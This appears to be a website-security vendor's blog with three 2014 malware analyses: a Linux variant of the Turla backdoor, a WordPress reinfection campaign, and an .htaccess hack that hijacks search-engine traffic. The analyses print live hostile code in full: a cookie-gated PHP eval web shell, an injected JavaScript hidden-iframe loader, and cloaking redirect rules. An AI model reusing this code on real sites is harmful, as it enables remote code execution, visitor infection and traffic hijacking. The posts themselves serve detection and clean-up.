Saturday, December 13, 2014

'Turla' Malware Now Supports Linux

New Sample Of 'Turla' Backdoor - Linux Version

Turla Malware


A new 'Turla' Trojan sample has been discovered that targeting Linux operating systems. The previous 'Turla' Trojan targeted Windows operating system but the newly discovered sample supports Linux operating systems too. 

The malware static linking to all required external libraries which makes it independent from
libraries and their versions installed on the victim machine.
'Turla' is derived from publicly available backdoor cd00r (http://www.phenoelit.org/stuff/cd00r.c) and it doesn't 
require administrator (root) privileges and could be executed by any user.
Once, the 'Turla' Trojan executed, it starts a network sniffer and listen for a specific network packet. Once the packet received 'Turla' activates backdoor functionality. 

The first 'Turla' Trojan sample was discovered in yearly 2012 when it was used to attack government computers and servers.

At the time this post was written, new sample was already detected by almost 50% of major antivirus engines

Sunday, November 23, 2014

Backdoor Malware Targeting WordPress Websites

Backdoor Malware In The Wild Targeting WordPress Websites



If your website gets reinfected every 20-30 minutes. If blacklisting authorities like Google Safe Browsing does not keep up with the reinfection and fail to inform you. If you run WordPress platform and use 3-d party plugins/themes.

Then, it is likely you suffer from Backdoor that our malware research labs have recently discovered while cleaning customer websites.

You can check your site with our external and free scan using Quttera Free Website Malware Scanner


Background of the infection


How many websites attacked?


There is no exact number but more than two thousands. During first weeks of this infection Google didn't recognize it. The malware code included logic to clean-up previous infection and insert a new one.

Which platforms were targeted?


Current version mostly aimed WordPress installations.


What malicious action was applied to victim sites and their visitors?


Successful attack injected hidden iframes into every JavaScript file. On home page load, visitor's web browser loaded numerous JS files and got connected in background to several other websites via iframes.


How many files were infected?


All JavaScript files available on attacked server.


Where the files were located?


All infected files located in wp-content and wp-include directories.


The root cause


How backdoor was identified?


One of our customers was blacklisted by Google due to another kind of infection. During the investigation current malware was uncovered as well. At the same time, we detected this infection on websites of our other customers, which bypassed Google's and other's radars.


Backdoor details


A backdoor (or just shell file) was uploaded utilizing themes/plugins vulnerabilities. Following is an example of how attacker searched for available vulnerability using HTTP HEAD request:

"HEAD /fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 "HEAD /fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 318 "-" "-" "HEAD /fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 318 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-" "HEAD /admin/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/asp/connector.asp HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/php/connector.php HTTP/1.1" 404 299 "-" "-" "HEAD /ckeditor/ckfinder/core/connector/aspx/connector.aspx HTTP/1.1" 404 318 "-" "-" "HEAD /kcfinder/browse.php HTTP/1.1" 404 299 "-" "-"


All of those were attempts to find a way to upload the following backdoor which is then used to infect the server:

<?php if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;


The backdoor decoded content of the "message" field provided in HTTP post request,

$message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message'])))))


executed provided commands,

eval($message)

and printed script output into returned HTML,

{echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;

The script is generic and it permites execution of any PHP code provided in "message" argument.

Finally, the target of this backdoor/shell was to execute and input script which then infected all JS files on the compromised system.

The actual infection is a header, prepended  to every JS file:

/* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*) "));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase( );var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone ','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure" )===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://iframehost/something17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt */


Attack flow


So how this worked?

  1. Server A searched the web for WordPress installations with known vulnerabilities.
  2. Backdoor/Shell uploaded to servers detected in step (1).
  3. Server B invokes the shell with a PHP code that performs JS files infection.
  4. Re-infection occurs every 20-30 minutes.


Malware clean-up


As a first step, we have identified the organization that owned the IP. We have then contacted the hosting provider and filed malware/abuse report.

We have conducted all necessary steps to clean up the 3K+ infected files, updated all outdated software and remode vulnerable plugins.

If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Friday, May 23, 2014

Htaccess Hack Serving BlackHat SEO

Search Engine Traffic Hijacking

We are cleaning infected websites on daily basis and the most common question we are being asked is how to identify Search Engine Traffic Hijacking before my website is infected further and Google (Yahoo, Bing or any other search engine provider) blacklists it. Usually, this is how a website owner notices that his website is infected and compromised.

The first thing to check out is .htaccess file which can be used to redirect traffic from search engines to a hijacker website. If your website is infected/ hacked using this method, it means that when someone finds your website on a search engine and clicks on a link to visit your website, he will be redirected to a hijacker website instead of yours.

How to find Search Engine Traffic Hijacking?

If you are experiencing traffic hijacking, most likely your .htaccess file updated with malicious code or new .htaccess files are populated across all your sub-directories.

Search for .htaccess file(s) within all your sub-directories, check your .htaccess file(s) for suspicious code and make sure they do not contain malicious code.

The most common way used to hijack search engine traffic is to add malicious code into existing .htaccess files. That way you, as website owner, won't notice anything strange as your website would be operating normally.

The other way is to wipe out the existing .htaccess file and replace it with malicious code only.

Here is an example from a very popular website that we cleaned-up recently. The malicious code was there for a short period of time, yet that was enough to get it blacklisted by Google. Actually, this is how the website administrator noticed it. The impact was that near 99% website traffic was redirected to other URLs.

Malware Investigation

External investigation of website by online remote malware scanner detected:
  1. Traffic redirect to malicious site
  2. Every HTML page contained hidden iframe to malicious IP as last line in body DOM element
From the investigation of .htaccess files it was found that infection was added to temporary redirect (302) to numerous URLs (some were already blacklisted by Google).




Hacked .htaccess file body example:

  1. RewriteEngine On
  2. RewriteCond %{REQUEST_METHOD}   ^GET$
  3. RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
  4. RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
  5. RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
  6. RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
  7. RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
  8. RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
  9. RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
  10. RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
  11. RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
  12. RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
  13. RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
  14. RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
  15. RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
  16. RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
  17. RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
  18. RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
  19. RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
  20. RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
  21. RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
  22. RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
  23. RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
  24. RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
  25. RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
  26. RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
  27. RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
  28. RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
  29. RewriteCond %{HTTPS}            ^off$
  30. RewriteRule ^(.*)$   http://url-to-malicious-site.com/cgi-bin/r.cgi?p=10003&i=36c7c8b3&j=333&m=649f84aa2d951f8f26df403fb179cdea&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

Payload

The execution algorithm can be described as following:

Apache is handling "HTTP-GET" request, -

IF visitor's:
  1. Source was from search engine (see below) 
  2. Agent used is not listed in table(see below) of user agents
  3. Passed cookie does not contain string "xccgtswgokoe"
Then
  1. Redirect visitor to URL "http://url-to-malicious-site.com/cgi-bin/r.cgi?p=10003&i=36c7c8b3&j=333&m=649f84aa2d"
  2. Inject cookie "xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly"

List of monitored search engines:
  1. http://google.*
  2. http://yahoo.*
  3. http://bing.*
  4. http://msn.*
  5. http://yandex.*
  6. http://ask.*
  7. http://excite.*
  8. http://altavista.*
  9. http://netscape.*
  10. http://aol.*
  11. http://hotbot.*
  12. http://goto.*
  13. http://infoseek.*
  14. http://mamma.*
  15. http://alltheweb.*
  16. http://lycos.*
  17. http://search.*
  18. http://metacrawler.*
  19. http://rambler.*
  20. http://mail.*
  21. http://dogpile.*
  22. http://ya.*


List of filtered out user agents should contain strings:

  1. Accoona
  2. Ace\sExplorer
  3. Amfibi
  4. Amiga\sOS
  5. AppleSyndication
  6. Archive
  7. Argus
  8. Ask\sJeeves
  9. Atrenko\sNews
  10. BeOS
  11. BigBlogZoo
  12. Biz360
  13. Blaiz
  14. BlogPulse
  15. BlogSearch
  16. Bloglines
  17. BlogsLive
  18. BlogsSay
  19. Bookmark
  20. CE\-Preload
  21. CFNetwork
  22. Combine
  23. Crawl
  24. DTAAgent
  25. Danger\shiptop
  26. Diagnostics
  27. EmeraldShield
  28. Evaal
  29. Everest\-Vulcan
  30. Feed
  31. Fetch
  32. FreeBSD
  33. Friendster
  34. Fuck\sYou
  35. Google
  36. Gregarius
  37. HP\-UX
  38. HTML2JPG
  39. HatenaScreenshot
  40. HolyCowDude
  41. Honda\-Search
  42. HttpClient
  43. IRIX
  44. Jakarta
  45. JetBrains
  46. Krugle
  47. Labrador
  48. LeechGet
  49. Liferea
  50. LinkChecker
  51. LinknSurf
  52. Linux
  53. LiveJournal
  54. Lonopono
  55. Lotus\-Notes
  56. Lycos
  57. Lynx
  58. Mac\_PPC
  59. Mac\_PowerPC
  60. Mac\s10
  61. Mediapartners
  62. Megite
  63. MetaProducts
  64. Miva
  65. Mobile
  66. NetBSD
  67. NetNewsWire
  68. NetResearchServer
  69. NewsAlloy
  70. NewsFire
  71. NewsGatorOnline
  72. NewsMacPro
  73. Nokia
  74. NuSearch
  75. Nutch
  76. ObjectSearch
  77. Octora
  78. OmniExplorer
  79. Omnipelagos
  80. Onet
  81. OpenBSD
  82. OpenIntelligenceData
  83. Python
  84. RSS
  85. Rambler
  86. Rojo
  87. SBIder
  88. Scooter
  89. Seeker
  90. Series\s60
  91. SharpReader
  92. SiteBar
  93. Slurp
  94. Snoopy
  95. Soap\sClient
  96. Socialmarks
  97. Sphere\sScout
  98. Straw
  99. SunOS
  100. Surfer
  101. Syndic8
  102. Syntryx
  103. TargetYourNews
  104. Technorati
  105. Thunderbird
  106. Twiceler
  107. Validator
  108. Vienna
  109. W3C
  110. WWWeasel
  111. Wavefire
  112. WebPatrol
  113. Webmaster
  114. Win16
  115. Win95
  116. Win98
  117. WinHTTP
  118. WinNT4
  119. Win\s9x
  120. Windows\s95
  121. Windows\s98
  122. Windows\sCE
  123. Windows\sNT\s4
  124. WordPress
  125. Yahoo
  126. Yandex
  127. Yeti
  128. YouReadMe
  129. Zhuaxia
  130. ZyBorg
  131. apache
  132. appie
  133. asterias
  134. bing
  135. blogWatcher
  136. bot
  137. cococ
  138. curl
  139. ecto
  140. endo
  141. exactseek
  142. findlinks
  143. heritrix
  144. httpunit
  145. iGetter
  146. iPhone
  147. ichiro
  148. larbin
  149. libwww
  150. macDN
  151. oreilly
  152. psycheclone
  153. retriever
  154. spider
  155. sproose
  156. subscriber
  157. urllib
  158. voyager
  159. webcollage
  160. wget
  161. wwwster
  162. yacy


Summary

The hijacked traffic was redirected using blackhat SEO techniques. Just to name a few, such as pills/pharma, phishing, cash loans, pay-per-click providers, begs sales and so on. Just to sum it up, - the attack was designed to hijack traffic and redirect it to whatsoever websites defined by an attacker.

Website Malware Scanning And Malware Clean-Up


Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, select from Malware Removal & Monitoring Plans for malware removal.

Alternatively, you can try to remove such malware using Quttera's website malware scan report and manually investigating your site's .htaccess file(s). Few important things to remember: make sure you use SFTP and not FTP, do backup, change password(s) and, of course, don't forget to submit your website(s) for re-testing and removing from blacklist if needed.